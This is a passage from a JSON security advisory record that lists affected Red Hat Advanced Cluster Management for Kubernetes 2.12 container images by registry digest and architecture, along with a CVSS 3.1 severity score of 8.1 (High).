"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
